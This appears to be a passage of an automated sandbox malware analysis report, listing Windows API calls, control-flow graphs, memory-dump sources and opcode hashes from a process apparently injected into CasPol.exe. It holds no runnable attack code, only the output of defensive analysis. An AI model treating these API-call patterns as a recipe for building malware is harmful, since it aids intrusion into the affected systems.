10e2aba 39315 10e2aef WSAConnect 39313->39315 39316 10e2b0e 39315->39316 39317 1d63afda 39320 1d63b00f GetExitCodeProcess 39317->39320 39319 1d63b038 39320->39319 39321 10e0e4e 39322 10e0ebe 39321->39322 39323 10e0e86 setsockopt 39321->39323 39322->39323 39324 10e0e94 39323->39324 39325 10e0d4a 39326 10e0d82 WSASocketW 39325->39326 39328 10e0dbe 39326->39328 39329 10e1a46 39330 10e1a7b WSAIoctl 39329->39330 39332 10e1ac9 39330->39332 39337 10e1ec6 39339 10e1efe RegOpenKeyExW 39337->39339 39340 10e1f4d 39339->39340 39341 1d63ad2a 39344 1d63ad5f K32EnumProcessModules 39341->39344 39343 1d63ad8e 39344->39343 39345 10e0942 39348 10e0977 GetFileType 39345->39348 39347 10e09a4 39348->39347 39349 10e4842 39350 10e486e GlobalMemoryStatusEx 39349->39350 39352 10e48ad 39349->39352 39351 10e487c 39350->39351 39352->39350 39353 1d63af32 39354 1d63af82 K32GetModuleBaseNameW 39353->39354 39355 1d63af8a 39354->39355 39356 10e1fda 39357 10e200f RegNotifyChangeKeyValue 39356->39357 39359 10e204c 39357->39359 39360 1d63b736 39361 1d63b762 OleInitialize 39360->39361 39362 1d63b798 39360->39362 39363 1d63b770 39361->39363 39362->39361 39364 1d63a4b6 39365 1d63a4e2 SetErrorMode 39364->39365 39366 1d63a50b 39364->39366 39367 1d63a4f7 39365->39367 39366->39365 39368 1d63aab6 39369 1d63aae5 AdjustTokenPrivileges 39368->39369 39371 1d63ab07 39369->39371 39372 10e01d6 39375 10e0211 LoadLibraryA 39372->39375 39374 10e024e 39375->39374 39376 10e1dd6 39377 10e1e0e RegOpenCurrentUser 39376->39377 39379 10e1e41 39377->39379 39380 10e0ad2 39381 10e0b07 ReadFile 39380->39381 39383 10e0b39 39381->39383 39384 10e256e 39385 10e25a3 GetNetworkParams 39384->39385 39387 10e25d3 39385->39387 39388 10e4d6a 39389 10e4d90 FindWindowW 39388->39389 39391 10e4dbe 39389->39391 39392 10e196a 39394 10e199f ioctlsocket 39392->39394 39395 10e19cb 39394->39395 39400 1d63b206 39401 1d63b23b NtQuerySystemInformation 39400->39401 39403 1d63b266 39400->39403 39402 1d63b250 39401->39402 39403->39401 39404 10e29e6 39406 10e2a1b GetAdaptersAddresses 39404->39406 39407 10e2a54 39406->39407 39408 10e1066 39409 10e109b RegQueryValueExW 39408->39409 39411 10e10e7 39409->39411 39412 204960a0 39413 204960c4 LdrInitializeThunk 39412->39413 39415 204960f2 39413->39415 39416 10e1b7e 39417 10e1bce CertGetCertificateChain 39416->39417 39418 10e1bd6 39417->39418 39419 10e187e 39422 10e18b3 GetProcessTimes 39419->39422 39421 10e18e5 39422->39421 39423 1d63ae12 39425 1d63ae47 K32GetModuleInformation 39423->39425 39426 1d63ae7e 39425->39426 39427 10e4a7a 39428 10e4aaf bind 39427->39428 39430 10e4ae3 39428->39430 39435 1d63a89a 39436 1d63a8c3 LookupPrivilegeValueW 39435->39436 39438 1d63a8ea 39436->39438 39439 1d63a09a 39440 1d63a107 39439->39440 39441 1d63a0cf recv 39439->39441 39440->39441 39442 1d63a0dd 39441->39442
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r$:@ r$:@ r$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$^O%r
                                    • API String ID: 0-3775228992
                                    • Opcode ID: c8e185c68bc80c2f753f9881c2f98cc22acf1a25f1a28a9303e4d24747ec623f
                                    • Instruction ID: 16fa3c456f76e6ab1e034d52aea73d136a05db7f5b8ee35ecd2e915e88ee193c
                                    • Opcode Fuzzy Hash: c8e185c68bc80c2f753f9881c2f98cc22acf1a25f1a28a9303e4d24747ec623f
                                    • Instruction Fuzzy Hash: B1A21974E016188FDB64DFB9C95479DBBF2AF88308F1480A9D509AB390EB35AD81CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ;$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$d$d$*Gr
                                    • API String ID: 0-4138557572
                                    • Opcode ID: 3bb66c4c329786dd3e8c0c8d5adfd8730353f6e363d4d5d71aacef12a0e1425b
                                    • Instruction ID: d0833a27b0fe5819683727b3355f669d0d31f89a29259094f1409707841aa9fc
                                    • Opcode Fuzzy Hash: 3bb66c4c329786dd3e8c0c8d5adfd8730353f6e363d4d5d71aacef12a0e1425b
                                    • Instruction Fuzzy Hash: F0C3B475D00A299FDB65CF68D940ACAF7F2AF89300F0581E5E90CAB221D775AE85CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$d$d$*Gr$*Gr
                                    • API String ID: 0-3711771251
                                    • Opcode ID: 8c2ef555fb388839804e1ac7a26606d0911ced075d5e7bc2ad021c6795e24577
                                    • Instruction ID: c3c4b23fa883dde28d5b23d510ee01f232c4233f17f5b78809449b69d48a9c53
                                    • Opcode Fuzzy Hash: 8c2ef555fb388839804e1ac7a26606d0911ced075d5e7bc2ad021c6795e24577
                                    • Instruction Fuzzy Hash: 2813D575D01A299FDB65CFA8C844A89F7F2BF88304F1581E6D90CAB221D771AE85CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$d$d$*Gr
                                    • API String ID: 0-3902647669
                                    • Opcode ID: 985630dfb26c15934e6e5a5f6095c7873d05d9be8fb62741a62da4433299a625
                                    • Instruction ID: 5c7610a75e20d380e748b8d67923197582296dd64202c11333d8c758a0aa1645
                                    • Opcode Fuzzy Hash: 985630dfb26c15934e6e5a5f6095c7873d05d9be8fb62741a62da4433299a625
                                    • Instruction Fuzzy Hash: 85C3A275D00A299FDB65CF68C940ACAF7F2BF89300F0585E5E90CAB221D775AE858F41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Fr$ Fr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr
                                    • API String ID: 0-1072066941
                                    • Opcode ID: cc54ba456ebb3570afa493324f937ebacf0b48c2ae1ef50b075d85b48c8999e6
                                    • Instruction ID: 57f3ca13e9f9cf1a9982db8d45509a9201a43d08cefbbc3b6e44398e4c179235
                                    • Opcode Fuzzy Hash: cc54ba456ebb3570afa493324f937ebacf0b48c2ae1ef50b075d85b48c8999e6
                                    • Instruction Fuzzy Hash: D0E23974A002158FDB14EB78E598B9DBBF2BF88315F118569E40ADB390DB39EC81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3566 203bde10-203bde1f 3567 203bde21-203bde2b 3566->3567 3568 203bde44-203bde9d 3566->3568 3569 203bde2d-203bde3e 3567->3569 3570 203bde40-203bde43 3567->3570 3773 203bdea3 call 1d7c05df 3568->3773 3774 203bdea3 call 203beabe 3568->3774 3775 203bdea3 call 203bec72 3568->3775 3776 203bdea3 call 1d7c0606 3568->3776 3777 203bdea3 call 203bea06 3568->3777 3569->3570 3575 203bdea9-203bdf74 3588 203bdfca-203bdfd4 3575->3588 3589 203bdf76-203bdfb6 3575->3589 3592 203bdfda-203bdff5 3588->3592 3589->3588 3594 203bdfb8-203bdfc8 3589->3594 3778 203bdff7 call 10e437e 3592->3778 3779 203bdff7 call 10e430d 3592->3779 3780 203bdff7 call 1d7c05df 3592->3780 3781 203bdff7 call 1d7c0606 3592->3781 3594->3592 3597 203bdffc-203be00a 3599 203be01a-203be189 3597->3599 3600 203be00c-203be9fc 3597->3600 3782 203be18a call 1d7c05df 3599->3782 3783 203be18a call 1d7c0606 3599->3783 3618 203be190-203be377 3639 203be9b9-203be9dc 3618->3639 3640 203be37d-203be38a 3618->3640 3641 203be9e1-203be9ee 3639->3641 3640->3641 3642 203be390-203be3df 3640->3642 3642->3639 3653 203be3e5-203be401 3642->3653 3654 203be403-203be40a 3653->3654 3655 203be412-203be419 3653->3655 3654->3639 3656 203be410 3654->3656 3655->3639 3657 203be41f-203be45a 3655->3657 3656->3657 3659 203be45c-203be475 3657->3659 3660 203be477-203be47f 3657->3660 3663 203be482-203be4ca 3659->3663 3660->3663 3668 203be9a0-203be9a6 3663->3668 3669 203be4d0-203be527 3663->3669 3668->3639 3670 203be9a8-203be9b1 3668->3670 3669->3668 3676 203be52d-203be537 3669->3676 3670->3642 3671 203be9b7 3670->3671 3671->3641 3676->3668 3677 203be53d-203be550 3676->3677 3677->3668 3678 203be556-203be57b 3677->3678 3682 203be961-203be984 3678->3682 3683 203be581-203be584 3678->3683 3691 203be989-203be98f 3682->3691 3683->3682 3684 203be58a-203be616 3683->3684 3702 203be61c-203be658 3684->3702 3703 203be760-203be766 3684->3703 3691->3639 3693 203be991-203be99a 3691->3693 3693->3668 3693->3678 3707 203be77c-203be782 3702->3707 3719 203be65e-203be693 3702->3719 3704 203be768-203be76a 3703->3704 3705 203be774 3703->3705 3704->3705 3705->3707 3708 203be790-203be793 3707->3708 3709 203be784-203be786 3707->3709 3711 203be79e-203be7a4 3708->3711 3709->3708 3713 203be7b2-203be7b5 3711->3713 3714 203be7a6-203be7a8 3711->3714 3716 203be705-203be735 3713->3716 3714->3713 3721 203be737-203be755 3716->3721 3725 203be7ba-203be7e8 3719->3725 3726 203be699-203be6bd 3719->3726 3728 203be75b 3721->3728 3729 203be7ed-203be842 3721->3729 3725->3721 3726->3725 3735 203be6c3-203be6f9 3726->3735 3728->3691 3748 203be84c-203be852 3729->3748 3749 203be844-203be84a 3729->3749 3735->3711 3747 203be6ff 3735->3747 3747->3716 3751 203be860 3748->3751 3752 203be854-203be856 3748->3752 3750 203be863-203be882 3749->3750 3755 203be89e-203be91e 3750->3755 3756 203be884-203be88d 3750->3756 3751->3750 3752->3751 3770 203be931-203be95f 3755->3770 3771 203be920-203be92a 3755->3771 3756->3755 3757 203be88f-203be897 3756->3757 3757->3755 3770->3691 3771->3770 3773->3575 3774->3575 3775->3575 3776->3575 3777->3575 3778->3597 3779->3597 3780->3597 3781->3597 3782->3618 3783->3618
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Fr$ Fr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr$\OGr
                                    • API String ID: 0-1072066941
                                    • Opcode ID: 274b64501f5acbcb1e56ced429a90d805382a247514366076ba1bba6addfee78
                                    • Instruction ID: d0c55d41d29ae9b19400f14d53fc123a1ac8d41f6e97a5dde5b60a0c3ae614aa
                                    • Opcode Fuzzy Hash: 274b64501f5acbcb1e56ced429a90d805382a247514366076ba1bba6addfee78
                                    • Instruction Fuzzy Hash: E8725135E006288FCB15DFA8C854B9EBBF2BF89304F1184A9D909AB361DB75AD45CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3784 1fa0e5eb-1fa0e614 3785 1fa0e616-1fa0e619 3784->3785 3786 1fa0e64b-1fa0e64e 3785->3786 3787 1fa0e61b-1fa0e61e 3785->3787 3790 1fa0e650 3786->3790 3791 1fa0e65e-1fa0e667 3786->3791 3788 1fa0e620-1fa0e629 3787->3788 3789 1fa0e62a-1fa0e62d 3787->3789 3792 1fa0e63d-1fa0e640 3789->3792 3793 1fa0e62f-1fa0e632 3789->3793 3794 1fa0e655-1fa0e658 3790->3794 3795 1fa0ec36-1fa0ec4a 3791->3795 3796 1fa0e66d-1fa0e691 3791->3796 3799 1fa0e646-1fa0e649 3792->3799 3800 1fa0e779-1fa0e77d 3792->3800 3797 1fa0ec31 3793->3797 3798 1fa0e638 3793->3798 3794->3791 3801 1fa0e736-1fa0e739 3794->3801 3808 1fa0ec69-1fa0ec6b 3795->3808 3809 1fa0ec4c-1fa0ec5f 3795->3809 3824 1fa0e693 3796->3824 3825 1fa0e698-1fa0e6c7 3796->3825 3797->3795 3798->3792 3799->3786 3799->3794 3805 1fa0e796-1fa0e7a2 3800->3805 3806 1fa0e77f 3800->3806 3803 1fa0e740-1fa0e743 3801->3803 3804 1fa0e73b 3801->3804 3811 1fa0e745-1fa0e753 3803->3811 3812 1fa0e756-1fa0e759 3803->3812 3804->3803 3805->3795 3810 1fa0e7a8-1fa0e7be 3805->3810 3813 1fa0e784-1fa0e786 3806->3813 3819 1fa0ec80-1fa0ec83 3808->3819 3820 1fa0ec6d-1fa0ec7e call 1fa007f0 3808->3820 3817 1fa0ec61-1fa0ec67 3809->3817 3818 1fa0ec84-1fa0ec9c 3809->3818 3810->3795 3821 1fa0e7c4-1fa0e7e2 3810->3821 3811->3812 3822 1fa0e767-1fa0e76a 3812->3822 3823 1fa0e75b-1fa0e762 3812->3823 3814 1fa0e788 3813->3814 3815 1fa0e78d-1fa0e790 3813->3815 3814->3815 3815->3785 3815->3805 3817->3808 3833 1fa0ec9e-1fa0ecbb 3818->3833 3834 1fa0ec2f-1fa0ec30 3818->3834 3820->3819 3821->3797 3840 1fa0e7e8-1fa0e812 3821->3840 3827 1fa0e774-1fa0e777 3822->3827 3828 1fa0e76c-1fa0e76f 3822->3828 3823->3822 3824->3825 3846 1fa0e6c9 3825->3846 3847 1fa0e6ce-1fa0e6e7 3825->3847 3827->3800 3827->3813 3828->3827 3835 1fa0ecd0-1fa0ecd3 3833->3835 3836 1fa0ecbd-1fa0ecce call 1fa007f0 3833->3836 3836->3835 3840->3795 3848 1fa0e818-1fa0e83a 3840->3848 3846->3847 3857 1fa0e6f0-1fa0e706 3847->3857 3858 1fa0e6e9-1fa0e6ee 3847->3858 3848->3797 3851 1fa0e840-1fa0e847 3848->3851 3852 1fa0ebe5-1fa0ebf1 3851->3852 3853 1fa0e84d-1fa0e853 3851->3853 3852->3795 3856 1fa0ebf3-1fa0ec06 3852->3856 3853->3795 3855 1fa0e859-1fa0e8da 3853->3855 3881 1fa0e8e0-1fa0e992 3855->3881 3882 1fa0e99a-1fa0ea07 call 1fa01810 3855->3882 3856->3797 3859 1fa0ec08-1fa0ec1c 3856->3859 3868 1fa0e708 3857->3868 3869 1fa0e70d-1fa0e724 3857->3869 3860 1fa0e729-1fa0e72b 3858->3860 3859->3797 3866 1fa0ec1e-1fa0ec20 3859->3866 3860->3793 3861 1fa0e731 3860->3861 3861->3801 3943 1fa0ec23 call 203b0aca 3866->3943 3944 1fa0ec23 call 1d7c05df 3866->3944 3945 1fa0ec23 call 1d7c0606 3866->3945 3868->3869 3869->3860 3871 1fa0ec29-1fa0ec2e 3871->3834 3881->3882 3900 1fa0eaeb-1fa0eb38 3882->3900 3901 1fa0ea0d-1fa0ea74 3882->3901 3916 1fa0eb3f-1fa0eb51 3900->3916 3901->3795 3920 1fa0ea7a-1fa0ea82 3901->3920 3916->3852 3921 1fa0eb57-1fa0eb5f 3916->3921 3920->3795 3922 1fa0ea88-1fa0eab1 3920->3922 3923 1fa0eb61-1fa0eb67 3921->3923 3924 1fa0eb79-1fa0eb80 3921->3924 3930 1fa0eab3-1fa0eab7 3922->3930 3931 1fa0ead7-1fa0eae3 3922->3931 3926 1fa0eb69 3923->3926 3927 1fa0eb6b-1fa0eb77 3923->3927 3924->3797 3925 1fa0eb86-1fa0ebc2 3924->3925 3925->3795 3939 1fa0ebc4-1fa0ebda 3925->3939 3926->3924 3927->3924 3930->3795 3933 1fa0eabd-1fa0ead4 3930->3933 3931->3900 3933->3931 3939->3797 3942 1fa0ebdc-1fa0ebdf 3939->3942 3942->3852 3942->3853 3943->3871 3944->3871 3945->3871
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r$:@ r$\OGr$\OGr$\OGr$\OGr$\OGr$^O%r$*Gr$*Gr$_%r
                                    • API String ID: 0-3591521049
                                    • Opcode ID: 5c9a675a4e38dd7191ceb08bde3ec42630183d397e1e288d59d74e0d99458b34
                                    • Instruction ID: 5827c1869fb308746f2820c3297b9997627ba9cb3b4f352f29a79700ca176a95
                                    • Opcode Fuzzy Hash: 5c9a675a4e38dd7191ceb08bde3ec42630183d397e1e288d59d74e0d99458b34
                                    • Instruction Fuzzy Hash: EA128F74B002159FDB14DBB8E894B9EB7F2AF88310F158469E509EB394DB39EC41CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4719 203bac70-203bac9d 4842 203baca3 call 1fa06938 4719->4842 4843 203baca3 call 1fa06948 4719->4843 4722 203baca8-203bacb2 4724 203bacb9-203baccb 4722->4724 4727 203baccd-203baccf 4724->4727 4728 203bacd4-203bad1b 4724->4728 4729 203bb1ce-203bb1d7 4727->4729 4738 203bad1d-203bad1f 4728->4738 4739 203bad24-203bad27 4728->4739 4738->4729 4740 203bad2d-203bad37 4739->4740 4741 203bb1a0 4739->4741 4742 203bad3d-203bad71 4740->4742 4743 203bb19c-203bb19e 4740->4743 4744 203bb1a5-203bb1c9 4741->4744 4742->4744 4753 203bad77-203bad93 4742->4753 4743->4729 4744->4729 4753->4744 4756 203bad99-203bada3 4753->4756 4756->4744 4757 203bada9-203badbf 4756->4757 4757->4744 4759 203badc5-203bb021 4757->4759 4759->4744 4804 203bb027-203bb02f 4759->4804 4804->4744 4805 203bb035-203bb03d 4804->4805 4805->4744 4806 203bb043-203bb064 4805->4806 4808 203bb07e-203bb088 4806->4808 4809 203bb066-203bb06a 4806->4809 4811 203bb08a-203bb08e 4808->4811 4812 203bb0cc-203bb0d3 4808->4812 4809->4744 4810 203bb070-203bb07b 4809->4810 4810->4808 4811->4744 4815 203bb094-203bb0c9 4811->4815 4813 203bb0ea-203bb104 4812->4813 4814 203bb0d5-203bb0d9 4812->4814 4825 203bb10a-203bb11c 4813->4825 4826 203bb188-203bb18e 4813->4826 4814->4744 4816 203bb0df-203bb0e7 4814->4816 4815->4812 4816->4813 4825->4826 4831 203bb11e-203bb166 4825->4831 4826->4741 4827 203bb190-203bb196 4826->4827 4827->4742 4827->4743 4839 203bb168-203bb16c 4831->4839 4840 203bb173-203bb185 4831->4840 4839->4840 4840->4826 4842->4722 4843->4722
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \OGr$\OGr$\OGr$\OGr$\OGr$^O%r$_%r
                                    • API String ID: 0-19599
                                    • Opcode ID: e75bddab6ed9a750a8e9f9e7a93caa61a3d81eaac6ad1bbb7f5fa53b2877e0cb
                                    • Instruction ID: d8172195e610fe121ae997c24718371dafee8e209581b8e2668778933e32c4d8
                                    • Opcode Fuzzy Hash: e75bddab6ed9a750a8e9f9e7a93caa61a3d81eaac6ad1bbb7f5fa53b2877e0cb
                                    • Instruction Fuzzy Hash: 10E19174B002149BDB24EFB9C86479EBAF2AFC8304F158529D50AAB784DF74AC41CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4986 203b7030-203b703c 4987 203b703e-203b7048 4986->4987 4988 203b7061-203b7087 4986->4988 4989 203b704a-203b705b 4987->4989 4990 203b705d-203b7060 4987->4990 4992 203b7089-203b7093 4988->4992 4993 203b70ac-203b70d7 4988->4993 4989->4990 4995 203b70a8-203b70ab 4992->4995 4996 203b7095-203b70a6 4992->4996 4999 203b70d9-203b70e3 4993->4999 5000 203b70fc-203b7127 4993->5000 4996->4995 5001 203b70f8-203b70fb 4999->5001 5002 203b70e5-203b70f6 4999->5002 5004 203b7129-203b7133 5000->5004 5005 203b714c-203b71e6 5000->5005 5002->5001 5007 203b7148-203b714b 5004->5007 5008 203b7135-203b7146 5004->5008 5019 203b71ec-203b71f3 5005->5019 5020 203b7597-203b75a8 5005->5020 5008->5007 5019->5020 5021 203b71f9-203b7200 5019->5021 5024 203b75aa-203b75bf 5020->5024 5025 203b7533 5020->5025 5021->5020 5023 203b7206-203b720d 5021->5023 5023->5020 5026 203b7213-203b723b 5023->5026 5027 203b75c1-203b75cb 5024->5027 5028 203b75e4-203b760f 5024->5028 5029 203b7552 5025->5029 5030 203b7535-203b7541 5025->5030 5036 203b7582-203b758c 5026->5036 5044 203b7241-203b7255 5026->5044 5031 203b75cd-203b75de 5027->5031 5032 203b75e0-203b75e3 5027->5032 5042 203b7611-203b761b 5028->5042 5043 203b7634-203b765f 5028->5043 5037 203b7557-203b7596 5029->5037 5034 203b725b-203b7264 5030->5034 5035 203b7547 5030->5035 5031->5032 5034->5037 5038 203b726a-203b72a2 5034->5038 5035->5036 5065 203b72a8-203b72b1 5038->5065 5066 203b74f3-203b7506 5038->5066 5047 203b761d-203b762e 5042->5047 5048 203b7630-203b7633 5042->5048 5052 203b7661-203b766b 5043->5052 5053 203b7684-203b76f1 5043->5053 5044->5034 5044->5036 5047->5048 5056 203b766d-203b767e 5052->5056 5057 203b7680-203b7683 5052->5057 5214 203b76f4 call 203b7eea 5053->5214 5215 203b76f4 call 1d7c05df 5053->5215 5216 203b76f4 call 1d7c0606 5053->5216 5056->5057 5070 203b72b7-203b72fe 5065->5070 5071 203b7516 5065->5071 5068 203b751b-203b751f 5066->5068 5072 203b752a 5068->5072 5073 203b7521 5068->5073 5086 203b74a8-203b74bb 5070->5086 5087 203b7304-203b7340 5070->5087 5071->5068 5072->5025 5073->5072 5085 203b76fa-203b7700 5088 203b770c-203b772e 5085->5088 5089 203b7702-203b770b 5085->5089 5090 203b74c7-203b74cb 5086->5090 5116 203b7342 5087->5116 5117 203b73b7-203b73d8 5087->5117 5091 203b79ca-203b79d3 5088->5091 5092 203b74cd 5090->5092 5093 203b74d6 5090->5093 5094 203b79f9-203b7a02 5091->5094 5095 203b79d5-203b79db 5091->5095 5092->5093 5093->5066 5098 203b7a0e-203b7a1d 5094->5098 5099 203b7a04 5094->5099 5095->5094 5097 203b79dd-203b79e6 5095->5097 5100 203b79e8-203b79f7 5097->5100 5101 203b7a3c 5097->5101 5103 203b7a1f-203b7a21 5098->5103 5099->5098 5100->5103 5107 203b7a41 5101->5107 5104 203b7733-203b774b 5103->5104 5105 203b7a27-203b7a3a 5103->5105 5111 203b776b-203b779b 5104->5111 5112 203b774d-203b7766 5104->5112 5105->5107 5111->5091 5124 203b77a1-203b77a7 5111->5124 5112->5107 5119 203b7345-203b734b 5116->5119 5120 203b74c2 5117->5120 5131 203b73de-203b740a 5117->5131 5119->5120 5121 203b7351-203b7361 5119->5121 5120->5090 5129 203b7363-203b737f 5121->5129 5130 203b73a6-203b73a9 5121->5130 5127 203b77ad-203b77c8 5124->5127 5128 203b79b4-203b79c5 5124->5128 5142 203b781a-203b7831 5127->5142 5143 203b77ca-203b7815 5127->5143 5128->5091 5129->5130 5144 203b7381-203b73a3 5129->5144 5132 203b73af-203b73b5 5130->5132 5133 203b74bd 5130->5133 5131->5120 5150 203b7410-203b743d 5131->5150 5132->5117 5132->5119 5133->5120 5155 203b785b-203b7872 5142->5155 5156 203b7833-203b7856 5142->5156 5179 203b799c-203b799f 5143->5179 5144->5130 5150->5120 5166 203b7443-203b7478 5150->5166 5167 203b78bb-203b78d2 5155->5167 5168 203b7874-203b78b6 5155->5168 5156->5179 5191 203b747a-203b7481 5166->5191 5192 203b7488-203b74a5 5166->5192 5182 203b78fc-203b7913 5167->5182 5183 203b78d4-203b78f7 5167->5183 5168->5179 5184 203b79af 5179->5184 5185 203b79a1-203b79a7 5179->5185 5182->5179 5196 203b7919-203b796c 5182->5196 5183->5179 5184->5128 5185->5124 5187 203b79ad 5185->5187 5187->5091 5191->5192 5192->5086 5211 203b796e-203b7975 5196->5211 5212 203b797c-203b7999 5196->5212 5211->5212 5212->5179 5214->5085 5215->5085 5216->5085
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r$_%r$_%r$_%r
                                    • API String ID: 0-1576307662
                                    • Opcode ID: 162105d35cbda98bd1465f729d1b3655930d838d78a3a185d24e9b397cbad7d3
                                    • Instruction ID: beda6c90c5de8b33ee415233203b469d1f926802b62e4a9e6d08db8813e138b8
                                    • Opcode Fuzzy Hash: 162105d35cbda98bd1465f729d1b3655930d838d78a3a185d24e9b397cbad7d3
                                    • Instruction Fuzzy Hash: 47529F34A042548FDB15DBB8C894A9DBFF2EF85304F15846AD409AB792DB38ED42CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: _%r$_%r
                                    • API String ID: 0-3934454027
                                    • Opcode ID: 2771d53456bf9c8ea2a4b663706b5c2542170036f5370b37289435d1e5963bca
                                    • Instruction ID: 2e1b441cc6ca0bbde716f702d378e327a84abefd4e878ca01e2f06dedd1c86d8
                                    • Opcode Fuzzy Hash: 2771d53456bf9c8ea2a4b663706b5c2542170036f5370b37289435d1e5963bca
                                    • Instruction Fuzzy Hash: 97529034B102148FCB14DBB8C494BAEBBF2AF89319F158569D509EB791DB38EC42CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ^O%r
                                    • API String ID: 0-665365895
                                    • Opcode ID: e1491c26c2e9d4cf5020de9ceab119a8e00ac065b7394c24303b6d203da5da11
                                    • Instruction ID: 3a71c05ec6ae0e1eba1e9f65ebf2bfc6f08aadf02775f7b9530e5814ea5106e5
                                    • Opcode Fuzzy Hash: e1491c26c2e9d4cf5020de9ceab119a8e00ac065b7394c24303b6d203da5da11
                                    • Instruction Fuzzy Hash: 48B19034B002149FDB14DBB9C494BAEBBF6AF88314F15C569D509AB391DB38EC41CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0ae787aa212fbfc9ce07dbf22c0040a68b7fded4781f4cbaa888d453b9ae1f19
                                    • Instruction ID: 29d645248c17e34ac3e1758fb2d517d0a9afc5ee9db3e1c0386725c687d56e44
